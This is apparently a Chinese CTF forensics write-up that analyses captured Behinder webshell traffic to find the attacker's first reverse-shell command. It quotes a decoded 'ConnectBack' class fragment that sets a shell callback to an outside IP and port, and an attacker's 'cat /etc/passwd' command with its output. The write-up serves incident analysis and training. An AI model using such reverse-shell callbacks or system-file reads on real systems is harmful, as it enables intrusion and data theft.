题目描述 #

关卡描述：黑客通过反连执行的第一条命令是什么？

Flag #

ip.addr == 202.1.1.66 && http.request.method == "POST" && http.request.uri contains "s74e7vwmzs21d5x6"

刚才已经通过第一条数据流获得密码、密钥。 使用[蓝队分析工具箱v1.08]（https://github.com/abc123info/BlueTeamTools/releases/tag/v1.08）得到BehinderDecode.class

tcp.stream eq 283

eBJS9iX1FmWXGh6C1a392iVa7RtT2YdDZ0Ljvu3JpUeSaNPquz+aDEJrwQJKNe …… e4bAOoeaJFutTh/Z/ri4tVAGLZpwNjbQqA=

使用 jadx-gui打开BehinderDecode.class

/* loaded from: BehinderDecode.class */
public class ConnectBack extends ClassLoader implements Runnable {
    public static String type = "shell";
    public static String ip = "202.1.1.129";
    public static String port = "4444";
    private ServletRequest Request;
    private ServletResponse Response;
    private HttpSession Session;

继续

tcp.stream eq 284

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin